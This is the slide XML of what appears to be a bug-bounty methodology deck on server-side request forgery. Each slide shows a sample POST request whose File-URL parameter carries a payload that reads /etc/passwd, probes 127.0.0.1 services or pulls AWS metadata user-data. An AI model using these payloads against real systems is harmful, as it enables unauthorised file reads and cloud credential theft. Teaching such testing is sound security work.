      </p:bgPr>
    </p:bg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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file:///etc/./passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///etc/./passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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28" name="Google Shape;328;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Google Shape;330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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Google Shape;332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2925" y="2675525"/>
            <a:ext cx="503200" cy="365100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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="Google Shape;334;p4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64025" y="3067788"/>
            <a:ext cx="421000" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file://\/\/etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file://\/\/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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42" name="Google Shape;342;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="344" name="Google Shape;344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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Google Shape;346;p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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-source:file:///etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-source:file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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54" name="Google Shape;354;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356" name="Google Shape;356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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Google Shape;358;p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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Internal Services</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;364;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:PORT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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66" name="Google Shape;366;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="368" name="Google Shape;368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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;372;p5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64025" y="3537325"/>
            <a:ext cx="421000" cy="34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5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64025" y="3939925"/>
            <a:ext cx="421000" cy="347900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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;375;p5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22925" y="4311450"/>
            <a:ext cx="503200" cy="365100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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="4277150"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="Google Shape;378;p52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22925" y="3110050"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/user-data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract User data </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/user-data</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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86" name="Google Shape;386;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
